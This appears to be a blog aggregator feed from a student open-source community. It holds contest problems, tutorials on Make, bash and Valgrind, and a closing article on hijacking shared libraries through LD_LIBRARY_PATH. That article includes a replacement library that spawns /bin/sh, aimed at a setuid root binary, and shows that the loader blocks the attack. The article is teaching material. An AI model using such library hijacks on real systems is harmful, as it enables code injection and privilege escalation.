14 May 2012
Problem 14 of the contest comes from a way of miming a more complicated word in a game of charades.
The idea is simple: if I have a complicated word, I mime simpler pieces of it, new words that are shorter and easier to mime. They do not have to match completely. For example, I could mime FREMEN and OM to eventually lead to FREON.
Given a list of words, you must identify the original word. You have access to wordlist in the current directory.
As input you will receive a line of space-separated words:
freemen om
As output, print the word that matches:
freon
To generate it, you will have to go through wordlist and identify the words that "sound like" a combination of the input words. It is up to you to define what "sounds like" means and how you combine the words.
A unique solution is guaranteed to exist.
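One possible reading of "sounds like" can be sketched in Python. Everything here is an assumption made for illustration, not the contest's definition: the input is limited to two words, a "combination" is a non-empty prefix of the first word followed by a non-empty suffix of the second, and "sounds like" is approximated by plain edit distance on spelling. The names edit_distance and guess_word are hypothetical.

```python
def edit_distance(a, b):
    """Classic Levenshtein distance between two strings."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1,                # delete from a
                               current[j - 1] + 1,             # insert into a
                               previous[j - 1] + (ca != cb)))  # substitute
        previous = current
    return previous[-1]


def guess_word(first, second, wordlist):
    """Return the wordlist entry closest to some prefix(first) + suffix(second)."""
    # Assumption: both pieces are non-empty, so the input words themselves
    # are never trivial answers.
    combos = {first[:i] + second[j:]
              for i in range(1, len(first) + 1)
              for j in range(len(second))}
    best = None
    for candidate in wordlist:
        if candidate in (first, second):
            continue
        score = min(edit_distance(candidate, combo) for combo in combos)
        if best is None or score < best[0]:
            best = (score, candidate)
    return best[1] if best else None


if __name__ == "__main__":
    # Tiny stand-in for the real wordlist file.
    print(guess_word("freemen", "om", ["apple", "freon", "zebra"]))
```

A phonetic encoding would probably match the spirit of the game better than raw spelling distance; the sketch only shows the overall shape of such a search.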
There are 10 tests, each worth 10 points.
The weight is 2.3.

by Mithrandir on 14 May 2012 05:11 AM
07 May 2012
Large projects have to be compiled from multiple source files. Since doing this by hand is quite difficult, different tools have been developed to make the task easier. One such tool is GNU Make, whose executable is make. Make solves the problem of compiling from multiple sources by using the dependency relationships between them, described in a special file usually called Makefile.
Syntax
The file that describes the dependency relationships between the project's sources should be named Makefile or makefile and has the following syntax:
target: dependency_list
<tab>command
Usually, the target's name matches the name of the resulting file; the exceptions are .PHONY targets, also called virtual targets, which do not generate a specific file. The dependency list contains the dependencies required to build the target. Usually, these are the files from which the target is built. A common mistake is to use spaces instead of a TAB before the command. This results in an error message when running make. An example Makefile is:
exec:
	gcc foo.c bar.c main.c -o exec
This is not the best way to use make, because it does not describe any dependencies: once the file exec exists, make considers the target up to date and will not run gcc foo.c bar.c main.c -o exec again, even if the sources have been modified. A better version is the following:
exec: foo.c bar.c main.c
	gcc foo.c bar.c main.c -o exec
In this case the target exec is rebuilt only if one of the sources is newer than it. This version still does not take full advantage of what make offers, because modifying a single source leads to recompiling all of them. An ideal Makefile describes dependencies at the lowest possible level. In our case that is the object file:
exec: foo.o bar.o main.o
	gcc foo.o bar.o main.o -o exec
foo.o: foo.c
	gcc -c foo.c -o foo.o
bar.o: bar.c
	gcc -c bar.c -o bar.o
main.o: main.c
	gcc -c main.c -o main.o
How it works
A particular target is built by running make target. If no argument is given, make builds the first target described. To build a target, all of its dependencies must be satisfied first. In our example, the exec target is built only after foo.o, bar.o and main.o, which in turn depend on foo.c, bar.c and main.c, have been obtained.
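The decision make takes for each target can be illustrated with a small Python sketch. It is a simplified model, not make's actual implementation: it assumes that a target is out of date when its file is missing or when any dependency has a newer modification time, and the helper name needs_rebuild is hypothetical.

```python
import os


def needs_rebuild(target, dependencies):
    """Simplified model of make's check for one target.

    The target must be rebuilt if its file does not exist or if any
    dependency was modified after it.
    """
    if not os.path.exists(target):
        return True
    target_mtime = os.path.getmtime(target)
    return any(os.path.getmtime(dep) > target_mtime for dep in dependencies)


if __name__ == "__main__":
    # With the Makefile above: is foo.o older than foo.c?
    if os.path.exists("foo.c"):
        print(needs_rebuild("foo.o", ["foo.c"]))
```

Make applies this kind of check recursively: before looking at exec it first brings foo.o, bar.o and main.o up to date.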
Variables
In a Makefile we can declare variables to replace sequences that are used often or that change frequently. A variable's value is obtained using the $ character: $(variable_name). For the example above, let's suppose that one of the source files uses functions from math.h. We declare a variable that specifies the library needed at link time:
LDFLAGS=-lm
exec: foo.o bar.o main.o
	gcc foo.o bar.o main.o -o exec $(LDFLAGS)
foo.o: foo.c
	gcc -c foo.c -o foo.o
bar.o: bar.c
	gcc -c bar.c -o bar.o
main.o: main.c
	gcc -c main.c -o main.o
Make offers several automatic variables, of which the most important are:
$@ - the target's name
$^ - the list of dependencies
$< - the first dependency
The Makefile above can be written more simply:
CC=gcc
LDFLAGS=-lm
exec: foo.o bar.o main.o
	$(CC) $^ -o $@ $(LDFLAGS)
%.o: %.c
	$(CC) -c $< -o $@
Variables in a Makefile can also come from the environment in which make is running. While running, make sees each environment variable as a make variable with the same name and the same value. Thus, setting a variable such as CFLAGS in the environment can change every command that uses it, as long as the Makefile does not assign that variable itself (assignments in the Makefile take precedence unless make is run with -e). To turn a make variable into an environment variable, so that it can be used by other Makefiles invoked from this one, we use the export directive:
export variable
The reverse is done using unexport:
unexport variable
.PHONY target
If we want a target to be permanently considered out of date, we declare it as a prerequisite of the special target .PHONY. Let's consider a pack target that creates an archive containing the project's sources. If a file named pack exists in the directory and it does not change, the command associated with this target will not be executed. Declaring pack as phony avoids this. Also, by convention, Makefiles contain a phony target called clean, used to delete the files obtained from compiling or running the program.
.PHONY: pack clean
pack:
	zip -r project.zip *
clean:
	rm *.o *.zip exec
Implicit Rules
Make allows us to use a simplified syntax. For example we don’t always have to write a command for some targets. This is called an implicit rule:
ana.o: ana.c
Another implicit rule is at work when we run the command make source: the file source.c is compiled into the executable source even if there is no Makefile. Implicit rules use predefined variables such as CC and CFLAGS, whose values can come from the environment. Thus, the example above is equivalent to:
ana.o: ana.c
	$(CC) $(CPPFLAGS) $(CFLAGS) -c ana.c -o ana.o
Because implicit rules use these variables, it is easy to modify their behavior by simply changing the variables' values.
Final touches
In many cases, the first target in a Makefile is a target that builds everything, conventionally named all. This is very useful because we do not have to specify a target every time we run make.
Adding these changes to our example we get a complete Makefile:
CC=gcc
LDFLAGS=-lm
all: exec
exec: foo.o bar.o main.o
	$(CC) $^ -o $@ $(LDFLAGS)
foo.o: foo.c
	$(CC) -c foo.c -o foo.o
bar.o: bar.c
	$(CC) -c bar.c -o bar.o
main.o: main.c
	$(CC) -c main.c -o main.o
.PHONY: all clean
clean:
	rm -rf *.o exec
07 May 2012 09:00 PM
05 May 2012
Problem 13 of the contest starts from a question found on Stack Overflow (Programming Puzzles & Code Golf). In fact, it is exactly that question, without the requirement for the shortest possible code or any other restrictions. Read the description, the input and the output there. An implementation is already posted there; try not to draw too much inspiration from it. Use the tests given there, but be aware that the ones here will be much more complex.
Execution time counts, measured in seconds, as an average over 10 successive runs. In addition, the maximum execution time for a test is 100 seconds. Time not used on one test carries over to the next test (rounded to seconds).
There are 10 tests in total, so the maximum running time of the program is 1000 seconds. The score is computed from the total time you obtain: any time under 500 seconds guarantees the maximum score, and beyond that the score decreases linearly.
The weight is 2.2. Good luck.
PS: I will NOT post an answer to the question on PCG. You may.

by Mithrandir on 05 May 2012 04:57 PM
Problem 10 of the contest is extremely simple. At first sight.
You are asked to build a program that can search for a list of words in a matrix of characters. Word Search is the description of the problem on Wikipedia.
As input you will receive two file names as command-line arguments. The first one describes the matrix, for example:
TODOW
RACOT
ASDFG
The second one contains the list of words to search for; not all of them are in the matrix. For example:
TODO
CAR
DOG
TREE
Since these words can be found horizontally, vertically or diagonally, your output must contain one line for each word found, in the following format: the word, the row and column of its starting character (indexed from 0), and the direction expressed as a compass direction (N, E, S, W, NE, SE, NW, SW). The order of the words does NOT matter. For example:
TODO 0 0 E
DOG 0 2 SE
CAR 1 2 W
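A brute-force search over the example above can be sketched in Python as follows. This is only one straightforward approach, with no attention paid to the time limit; the names DIRECTIONS, find_word and search are made up for the illustration, and the grid and word list are passed in directly instead of being read from the two files.

```python
# Row/column deltas for each compass direction (N is towards row 0).
DIRECTIONS = {
    "N": (-1, 0), "NE": (-1, 1), "E": (0, 1), "SE": (1, 1),
    "S": (1, 0), "SW": (1, -1), "W": (0, -1), "NW": (-1, -1),
}


def find_word(grid, word):
    """Return (row, column, direction) of the first match, or None."""
    rows, cols = len(grid), len(grid[0])
    for r in range(rows):
        for c in range(cols):
            for name, (dr, dc) in DIRECTIONS.items():
                # Skip directions where the word would leave the grid.
                end_r = r + dr * (len(word) - 1)
                end_c = c + dc * (len(word) - 1)
                if not (0 <= end_r < rows and 0 <= end_c < cols):
                    continue
                if all(grid[r + dr * i][c + dc * i] == ch
                       for i, ch in enumerate(word)):
                    return r, c, name
    return None


def search(grid, words):
    """Collect (word, row, column, direction) for every word that is found."""
    found = []
    for word in words:
        hit = find_word(grid, word)
        if hit is not None:
            found.append((word, *hit))
    return found


if __name__ == "__main__":
    grid = ["TODOW", "RACOT", "ASDFG"]
    for word, row, col, direction in search(grid, ["TODO", "CAR", "DOG", "TREE"]):
        print(word, row, col, direction)
```

On the example grid this reports TODO, CAR and DOG with the positions shown above and skips TREE.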
There are 10 tests, each with 10 findable words. Each correctly found word is worth 1 point. There are NO multiple solutions.
Running time for each test: 10s.
Weight: 1.9.
Good luck.

by Mithrandir on 05 May 2012 04:25 AM
29 April 2012
Most Linux users prefer to use the CLI because of its efficiency. But the days of the single terminal in which you had your shell are long gone. Users take advantage of the GUI and use graphical terminals like gnome-terminal, konsole or similar utilities, to start several shell instances. For example if you are a programmer, you might want to have one instance for the editor (with the code you are working on), another one to test and debug the compiled executable and – maybe – another for the documentation (man pages). If you are a system administrator you might have a shell with the configuration file of a service, one you use to test the running service, and maybe one shell connected to another server. But having a lot of windows (or tabs) can get confusing.
Some prefer to optimize their environment and use a CLI-oriented Window Manager, like xmonad, to productively manage windows without the use of the mouse. But what if you can only get access to a single terminal, as with an SSH session to a remote host? What if you don't have a GUI, as when configuring a server on-site? Or what if you just like to have one terminal window opened? What you can do is install terminal multiplexing programs like screen or tmux. These programs fork several shell instances behind your primary shell instance and you can switch between them using keyboard shortcuts. Or you can learn to make use of things your shell (bash, for example) already offers you.
Lesson 1: Don’t close things that you will open again soon.
If you are using your editor to write code or to change a configuration file and you want to compile the code or restart a service and test the result, you can suspend your editor and send it into the background with the CTRL-Z keyboard shortcut, which sends a SIGTSTP signal to the process. You can run other commands and then return to your edited file with the fg command. You may have several jobs in the background for that shell instance. You can use the jobs command to see them and their job IDs, and you can bring a specific job to the foreground with fg $JOBID.
Some processes cannot be sent into the background with the CTRL-Z shortcut. For example, if you have an ssh connection to a remote server, CTRL-Z acts on the process running on the remote host, not on the local ssh client. In this case you need to use the ssh escape sequence [ENTER]~ followed by CTRL-Z (you need to press Enter, then the ~ key, then the CTRL and Z keys together).
Always try to take advantage of the current process's features. For example, you can run make from inside vim (or run any command by prefixing it with a !), and you can kill a process from inside top or htop.
Lesson 2: Save paths for directories you need.
Unlike a GUI, in a CLI you can go directly to a specific directory from the current one by cd-ing to an absolute or relative path (not going one directory at a time like in the GUI). But you shouldn’t always have to type the path. If you are going back and forth between two directories, use the cd - command to change directory to the last working directory you were in.
If you have several directories to go through, but you know you will return to a specific one, you can use the directory stack to save that directory. With pushd $DIR you push a directory onto the stack (pushd . saves the current one), and popd later takes you back to the saved directory.
Also, you can always use the reverse history (CTRL-R) to reuse commands already given.
rosedu:~# cd /etc/apache2/sites-available/
rosedu:/etc/apache2/sites-available# cd /var/www/
rosedu:/var/www# cd -
/etc/apache2/sites-available
rosedu:/etc/apache2/sites-available# pushd .
/etc/apache2/sites-available /etc/apache2/sites-available
rosedu:/etc/apache2/sites-available# cd /home
rosedu:/home# cd /etc/
rosedu:/etc# popd
/etc/apache2/sites-available
rosedu:/etc/apache2/sites-available#
Lesson 3: Always know who and where you are.
Some people open different terminals to keep track of what they are doing or where they are (and never change the location inside that terminal). The shell is designed to have its current directory changed, and the prompt helps you know where you are. A normal prompt looks like user@host:current_path$. It's important to know which user you are logged in as and on which machine. The $ and # characters show you what privileges you have (limited or administrator, respectively). The current_path is usually the name of the current directory (but it can sometimes be a full path). If that doesn't give you enough information, use the pwd command to print the working directory or set up the PS1 variable to include more information.
Shells like bash have lots of not so well known tricks. But if you learn those tricks, they will make your life easier.
29 April 2012 09:00 PM
28 April 2012
A good programmer has a variety of tools to help him in developing good applications. We talked about gdb in an article at the beginning of April. Now, it is time for a crash introduction to Valgrind.
This program is a collection of different tools. For example, it offers a heap profiler, a thread error detector and a cache profiler. However, the tool that made Valgrind famous is Memcheck, a memory error detector. Because of its popularity, this tool is the default one (to use other Valgrind tools you have to pass the --tool=<toolname> command line argument). In this article, we will concentrate on Memcheck only.
Detecting memory leaks
Mainly, one would use Valgrind to detect memory leaks in his application. By this, we mean memory which was allocated but wasn’t released back. For example, take this program:
#include <stdio.h>
#include <stdlib.h>

void f()
{
    int *a = calloc(1024, sizeof(a[0])); /* allocated, never freed */
}

int main()
{
    int i;

    for (i = 0; i < 1024; i++)
        f();
    return 0;
}
This program allocates 1024 blocks of 1024 ints each, that is sizeof(int) MB of memory, and never frees them. Of course, at the end of the execution, the operating system takes care of releasing this memory. However, suppose that the f function was instead called from a server executable which shouldn't be stopped. In this case, each invocation of f would eat away sizeof(int) KB of memory (4 KB on common platforms, where int is 4 bytes wide).
The example is simple, and the problem can be spotted with the naked eye. However, let's see what Valgrind tells us:
==11418== Memcheck, a memory error detector
==11418== Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.
==11418== Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info
==11418== Command: ./a.out
==11418==
==11418==
==11418== HEAP SUMMARY:
==11418== in use at exit: 4,194,304 bytes in 1,024 blocks
==11418== total heap usage: 1,024 allocs, 0 frees, 4,194,304 bytes allocated
==11418==
==11418== LEAK SUMMARY:
==11418== definitely lost: 4,194,304 bytes in 1,024 blocks
==11418== indirectly lost: 0 bytes in 0 blocks
==11418== possibly lost: 0 bytes in 0 blocks
==11418== still reachable: 0 bytes in 0 blocks
==11418== suppressed: 0 bytes in 0 blocks
==11418== Rerun with --leak-check=full to see details of leaked memory
==11418==
==11418== For counts of detected and suppressed errors, rerun with: -v
==11418== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 3 from 3)
The number that gets repeated on each line of the output is the PID of our executable. At the end of the run, we are offered a heap summary (from where we can see that our program allocated 4MB of memory) and a leak summary.
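The figures in the heap summary can be checked by hand. A quick sketch of the arithmetic in Python, assuming sizeof(int) is 4 bytes as on the amd64 machine that produced the log:

```python
CALLS = 1024      # iterations of the loop in main
ELEMENTS = 1024   # elements requested by each calloc
INT_SIZE = 4      # assumption: sizeof(int) == 4

bytes_per_call = ELEMENTS * INT_SIZE    # leaked by one invocation of f
total_bytes = CALLS * bytes_per_call    # leaked by the whole program

print(bytes_per_call, total_bytes)      # 4096 4194304
```

The total matches the 4,194,304 bytes in 1,024 blocks that Memcheck reports as definitely lost.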
Let’s see what happens after we take into account the suggestion to run with --leak-check=full. First, we compile the program adding debugging information, using the -g GCC flag. And, then, we run the executable under Valgrind:
mihai@keldon:/tmp/mm/valgrind$ valgrind --leak-check=full ./a.out
==11527== Memcheck, a memory error detector
==11527== Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.
==11527== Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info
==11527== Command: ./a.out
==11527==
==11527==
==11527== HEAP SUMMARY:
==11527== in use at exit: 4,194,304 bytes in 1,024 blocks
==11527== total heap usage: 1,024 allocs, 0 frees, 4,194,304 bytes allocated
==11527==
==11527== 4,194,304 bytes in 1,024 blocks are definitely lost in loss record 1 of 1
==11527== at 0x4C29024: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11527== by 0x4004F2: f (1.c:6)
==11527== by 0x400513: main (1.c:14)
==11527==
==11527== LEAK SUMMARY:
==11527== definitely lost: 4,194,304 bytes in 1,024 blocks
==11527== indirectly lost: 0 bytes in 0 blocks
==11527== possibly lost: 0 bytes in 0 blocks
==11527== still reachable: 0 bytes in 0 blocks
==11527== suppressed: 0 bytes in 0 blocks
==11527==
==11527== For counts of detected and suppressed errors, rerun with: -v
==11527== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 3 from 3)
This time, we see that the memory was allocated in line 6 in function f. This allows us to insert the needed free at the correct spot.
Quick question: what would have happened if our program was compiled with optimizations on (try -O3 for example)?
Wrong cases of memory release
What happens when we free the same memory address twice? Let’s use this program:
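#include <stdio.h>
#include <stdlib.h>

void *f()
{
    int *a = calloc(16, sizeof(a[0]));
    free(a);     /* first free */
    return a;    /* returns a dangling pointer */
}

int main()
{
    int *a = f();
    free(a);     /* second free of the same block */
    return 0;
}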
Running it with Valgrind yields:
mihai@keldon:/tmp/mm/valgrind$ valgrind ./a.out
==11734== Memcheck, a memory error detector
==11734== Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.
==11734== Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info
==11734== Command: ./a.out
==11734==
==11734== Invalid free() / delete / delete[] / realloc()
==11734== at 0x4C29A9E: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11734== by 0x40057A: main (1.c:14)
==11734== Address 0x51d2040 is 0 bytes inside a block of size 64 free'd
==11734== at 0x4C29A9E: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11734== by 0x400552: f (1.c:7)
==11734== by 0x40056A: main (1.c:13)
==11734==
==11734==
==11734== HEAP SUMMARY:
==11734== in use at exit: 0 bytes in 0 blocks
==11734== total heap usage: 1 allocs, 2 frees, 64 bytes allocated
==11734==
==11734== All heap blocks were freed -- no leaks are possible
==11734==
==11734== For counts of detected and suppressed errors, rerun with: -v
==11734== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 3 from 3)
We can see both locations where the memory was released.
Now, consider this C++ code, a tweaked version of the above:
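#include <stdio.h>
#include <stdlib.h>

int *f()
{
    int *a = (int *)calloc(16, sizeof(a[0]));
    return a;
}

int main()
{
    int *a = f();
    delete a;    /* allocated with calloc, so it should be released with free */
    return 0;
}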
Running under Valgrind, we receive the following output (we will use -q to show only the errors reported by Valgrind – no header and no statistics at the end):
mihai@keldon:/tmp/mm/valgrind$ valgrind -q ./a.out
==11757== Mismatched free() / delete / delete []
==11757== at 0x4C2972C: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11757== by 0x400659: main (1.c:13)
==11757== Address 0x59e0040 is 0 bytes inside a block of size 64 alloc'd
==11757== at 0x4C29024: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11757== by 0x400632: f() (1.c:6)
==11757== by 0x400649: main (1.c:12)
Before finishing this section, let’s consider the case of freeing from inside an allocated block. See this code:
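#include <stdio.h>
#include <stdlib.h>

void *f()
{
    int *a = calloc(16, sizeof(a[0]));
    return a + 4;    /* points 16 bytes inside the block */
}

int main()
{
    int *a = f();
    free(a);         /* not the address returned by calloc */
    return 0;
}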
Valgrind gives the following output:
mihai@keldon:/tmp/mm/valgrind$ valgrind -q ./a.out
==11765== Invalid free() / delete / delete[] / realloc()
==11765== at 0x4C29A9E: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11765== by 0x400572: main (1.c:13)
==11765== Address 0x51d2050 is 16 bytes inside a block of size 64 alloc'd
==11765== at 0x4C29024: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==11765== by 0x400542: f (1.c:6)
==11765== by 0x400562: main (1.c:12)
From this we can easily see that we tried to free from inside an allocated block instead of using the block’s address. Moreover, we find where the block was allocated and we can fix our program now.
Incorrect usage of memory
Let’s see this simple code:
#include <stdio.h>
#include <stdlib.h>

struct s {
    int a, b;
};

int main()
{
    struct s s;
    s.a = 42;
    if (s.b)    /* s.b was never initialized */
        printf("s.b\n");
    return 0;
}
We didn’t initialize s.b. Valgrind reports this:
mihai@keldon:/tmp/mm/valgrind$ valgrind -q ./a.out
==11868== Conditional jump or move depends on uninitialised value(s)
==11868== at 0x4004F0: main (1.c:12)
==11868==
This was simple. Now, consider this common case:
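#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    char *s = strdup("Valgrind rocks");
    char *q = malloc(strlen(s));    /* no room for the terminating '\0' */
    strcpy(q, s);
    return 0;
}
This code looks perfectly valid. But is it? Valgrind says otherwise: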
mihai@keldon:/tmp/mm/valgrind$ valgrind -q ./a.out
==12038== Invalid write of size 1
==12038== at 0x4C2B27F: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==12038== by 0x4005FC: main (1.c:9)
==12038== Address 0x51d209e is 0 bytes after a block of size 14 alloc'd
==12038== at 0x4C2A93D: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==12038== by 0x4005E5: main (1.c:8)
Indeed, we forgot to reserve space for the terminating \0 character. Suppose we apply this fix: we replace strcpy(q, s) with strcpy(q, s + 1). This works.
Now, let us assume that, by mistake, we also replace q with s:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    char *s = strdup("Valgrind rocks");

    strcpy(s, s + 1);    /* source and destination overlap */
    return 0;
}
Valgrind is quick to show us that we are using strcpy in a wrong way, possibly destroying content:
mihai@keldon:/tmp/mm/valgrind$ valgrind -q ./a.out
==12058== Source and destination overlap in strcpy(0x51d2040, 0x51d2041)
==12058== at 0x4C2B2F5: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==12058== by 0x400600: main (1.c:9)
But what if that was the intended behaviour? What if we really needed to remove the first letter of s?
We can generate a suppression and use it in other calls of Valgrind to ignore this error. To generate it, we use another flag:
mihai@keldon:/tmp/mm/valgrind$ valgrind --gen-suppressions=yes -q ./a.out
==12079== Source and destination overlap in strcpy(0x51d2040, 0x51d2041)
==12079== at 0x4C2B2F5: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==12079== by 0x400600: main (1.c:9)
==12079==
==12079==
==12079== ---- Print suppression ? --- [Return/N/n/Y/y/C/c] ---- y
{
<insert_a_suppression_name_here>
Memcheck:Overlap
fun:strcpy
fun:main
}
We copy the printed lines into a file, strcpy_main.supp:
{
strcpy_main
Memcheck:Overlap
fun:strcpy
fun:main
}
When we run Valgrind again, we will use this file to ignore that error.
mihai@keldon:/tmp/mm/valgrind$ valgrind --suppressions=strcpy_main.supp -q ./a.out
mihai@keldon:/tmp/mm/valgrind$
Even though this works, we should not use strcpy with overlapping arguments (memmove is the function designed for overlapping copies). The manual page for strcpy says:
The strcpy() function copies the string pointed to by src, including
the terminating null byte ('\0'), to the buffer pointed to by dest. The
strings may not overlap, and the destination string dest must be large
enough to receive the copy.
One last word before finishing this article. If your program has too many errors, Valgrind tries to be funny and gives the following message:
==21573== More than 10000000 total errors detected. I'm not reporting any more.
==21573== Final error counts will be inaccurate. Go fix your program!
You should do this, of course.
In a later article we will show how you can combine Valgrind and GDB to fix some nasty bugs. Until then, remember how to use Memcheck and keep in mind that Valgrind has many other useful tools, and that a programmer can write new ones if needed.
28 April 2012 09:00 PM
Problem 12 of the contest is based on important concepts from the theory of functional languages :) It will be somewhat harder than the previous ones, but not by much.
You are asked to implement an evaluator for expressions that use SKI combinators.
As input, on stdin, you will receive a well-formed expression containing only S, K, I, ( and ). Using the evaluation rules, you must reduce the expression to its minimal form.
Print the output, the minimized expression, to stdout.
For example, for the input SKSK you will print K, resulting from the evaluation SKSK -> KK(SK) -> K. Similarly, for the input KKKSKS you will print SS, following the chain KKKSKS -> KSKS -> SS.
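The two chains above can be reproduced with a small evaluator. The Python sketch below is one possible approach, not a reference solution: it uses the standard reduction rules Ix -> x, Kxy -> x and Sxyz -> xz(yz), always reduces the leftmost-outermost redex, and gives up after max_steps steps because some expressions never reach a minimal form. The function names and the step limit are choices made for this illustration.

```python
def parse(source):
    """Parse a well-formed SKI expression into nested (function, argument) pairs."""
    position = 0

    def sequence():
        nonlocal position
        term = None
        while position < len(source) and source[position] != ")":
            symbol = source[position]
            position += 1
            if symbol == "(":
                atom = sequence()
                position += 1  # skip the matching ")"
            else:
                atom = symbol
            # Application associates to the left: abc means (ab)c.
            term = atom if term is None else (term, atom)
        return term

    return sequence()


def show(term, is_argument=False):
    """Print a term with the minimum number of parentheses."""
    if isinstance(term, str):
        return term
    text = show(term[0]) + show(term[1], True)
    return "(" + text + ")" if is_argument else text


def apply_all(head, args):
    """Rebuild head applied to args, left to right."""
    for arg in args:
        head = (head, arg)
    return head


def step(term):
    """Perform one leftmost-outermost reduction; return (term, changed)."""
    args = []
    head = term
    while isinstance(head, tuple):  # unwind the application spine
        args.append(head[1])
        head = head[0]
    args.reverse()
    if head == "I" and len(args) >= 1:
        return apply_all(args[0], args[1:]), True
    if head == "K" and len(args) >= 2:
        return apply_all(args[0], args[2:]), True
    if head == "S" and len(args) >= 3:
        x, y, z = args[:3]
        return apply_all(((x, z), (y, z)), args[3:]), True
    # The head cannot fire, so try to reduce inside the arguments.
    for index, arg in enumerate(args):
        reduced, changed = step(arg)
        if changed:
            args[index] = reduced
            return apply_all(head, args), True
    return term, False


def evaluate(source, max_steps=10000):
    term = parse(source)
    for _ in range(max_steps):
        term, changed = step(term)
        if not changed:
            break
    return show(term)


if __name__ == "__main__":
    print(evaluate("SKSK"), evaluate("KKKSKS"))
```

Representing terms as nested pairs keeps the sketch short; a solution aimed at large inputs would more likely use graph reduction with sharing.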
There are 100 tests, each worth 1 point.
The weight is 2.1.
Good luck.
PS: As a bit of history, I first met these combinators at the first CCC I watched, 2.5 years ago. Last year, at a PP lab in which I was teaching Lambda 0, Ștefan was reading To Dissect a Mockingbird, related to To Mock a Mockingbird (a title similar to To Kill a Mockingbird but unrelated; in any case, I am putting both on my reading list). Finally, about a year ago Luci sent me a link to the 2011 edition of the ICFP PC: Lambda the Gathering. Since then I have had a certain project in mind; it will get done someday.

by Mithrandir on 28 April 2012 11:10 AM
25 April 2012
The summer program for working on Open Source projects from home, started 5 years ago by ROSEdu, continues with fresh energy!

This year the stakes are higher for students, thanks to the 1000 € grant and, of course, the technical challenges raised by the proposed projects.
What you have to do if you want to be one of the participants in this program:
- show interest in one of the proposed software projects
- apply: it is not hard; you prepare, write the application, ask for feedback and make your case
What you will gain from RSoC:
- work experience in a software project
- experience working with a community
- the freedom to stay at home/in the mountains/at the seaside while being paid
by Alex Eftimie on 25 April 2012 06:07 PM
22 April 2012
Based on the previous article, let’s go one step further and study a similar exploit. This time we’ll be dealing with executables and dynamic libraries.
Let’s consider a simple custom library function:
/* random.h */
int xkcd_random(void);
/* random.c */
int xkcd_random()
{
    return 4;
}
We can build it into a shared library:
$ gcc -shared -fPIC -o librandom.so random.c
Let’s take a simple program that uses our function:
/* main.c */
#include <stdio.h>
#include "random.h"
int main(void)
{
    printf("8ball says:%d\n", xkcd_random());
    return 0;
}
If we want to use our shared object file from the current directory, we have to do two things. First, compile the program and link it against the shared library (with the -l flag), looking for libraries in the current directory (we do that using the -L. flag).
$ gcc -o main -L. main.c -lrandom
Second, the library is resolved at link time, but it will not be loaded at runtime unless the loader knows where to find it, which we tell it through the LD_LIBRARY_PATH variable.
$ ./main
./main: error while loading shared libraries: librandom.so: cannot open shared object file: No such file or directory
$ export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
$ ./main
8ball says:4
To ensure that we can always use the library, we can place it in the system's library directory. Note that this means that we trust the code of that library, and that only the administrator can do this.
# mv librandom.so /usr/lib
So now, each time the main program runs, the loader will dynamically load the random function from the system. But what if we have another function, from another library that has the same name, but does something else:
/* evil.c */
#include <unistd.h>
int xkcd_random()
{
    return 666;
}
$ gcc -shared -fPIC -o librandom.so evil.c
If we prepend the . directory to the LD_LIBRARY_PATH variable, the loader will use ./librandom.so instead of /usr/lib/librandom.so, and no modification of the main program is required (no recompilation needed).
$ ./main
8ball says:4
$ export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
$ ./main
8ball says:666
This is similar to the PATH variable hack discussed in the previous article, but at a much lower level. We can add a possible exploit here, such as executing a shell:
#include <unistd.h>
int xkcd_random()
{
    execlp("/bin/sh", "/bin/sh", (char *)NULL);
    return 666;
}
As before, we use a root-owned executable that has the SETUID bit set, in order to run things as root.
$ ls -la main
-rwsrwsr-x 1 root root 7192 2012-04-18 15:13 main
$ export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
$ ./main
8ball says:4
The program executed safely.
The library loader is smart enough to ignore LD_LIBRARY_PATH when the executable is setuid, precisely because of such attacks. So even though you can exploit programs as a normal user, you cannot affect the system. So the low level is a little more secure than the scripting level.
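The behaviour seen in the two experiments can be summarized with a toy model of the lookup. The Python sketch below is a deliberate simplification and not the loader's real algorithm (which also consults RPATH/RUNPATH entries and the ld.so cache): it only assumes that directories from LD_LIBRARY_PATH are tried before the system directories and that they are skipped entirely for setuid programs. The function resolve_library and its parameters are hypothetical.

```python
import os
import posixpath


def resolve_library(name, ld_library_path, system_dirs, secure_mode,
                    exists=os.path.exists):
    """Return the first path where `name` is found in this simplified model."""
    search_dirs = []
    if not secure_mode:
        # Ordinary programs: LD_LIBRARY_PATH entries are tried first.
        search_dirs += [d for d in ld_library_path.split(":") if d]
    # Setuid programs (secure_mode=True) only see the trusted directories.
    search_dirs += system_dirs
    for directory in search_dirs:
        candidate = posixpath.join(directory, name)
        if exists(candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Pretend both the evil and the system copy of the library exist.
    files = {"./librandom.so", "/usr/lib/librandom.so"}
    for secure in (False, True):
        print(secure, resolve_library("librandom.so", ".", ["/usr/lib"],
                                      secure, files.__contains__))
```

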